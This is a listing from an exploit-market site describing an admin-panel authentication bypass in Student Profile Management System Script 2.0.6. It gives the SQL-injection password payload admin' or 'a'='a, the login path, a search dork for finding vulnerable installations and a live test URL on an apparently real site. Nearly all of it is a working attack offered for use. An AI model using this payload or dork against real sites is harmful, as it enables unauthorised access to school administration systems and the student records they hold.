[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass Vulnerability

Author
L0RD
Risk
[
Security Risk High
]
0day-ID
0day-ID-29717
Category
web applications
Date add
05-02-2018
Platform
php
# Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass
# Dork: "Powered by: i-Net Solution"
# Date: 2018-02-06
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/
# Version: 2.0.6
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,Attacker can bypass admin panel Authentication. 
# # # # #
# Proof of Concept: 
 
# username : anything 
# password : admin' or 'a'='a
# admin panel login : /admin_login.php
# PoC video : http://s8.picofile.com/file/8318619226/autentication_bypass.mp4.html

 Test : http://schoolcollageerp.com/studentprofile/admin_login.php 


#  0day.today [2024-06-16]  #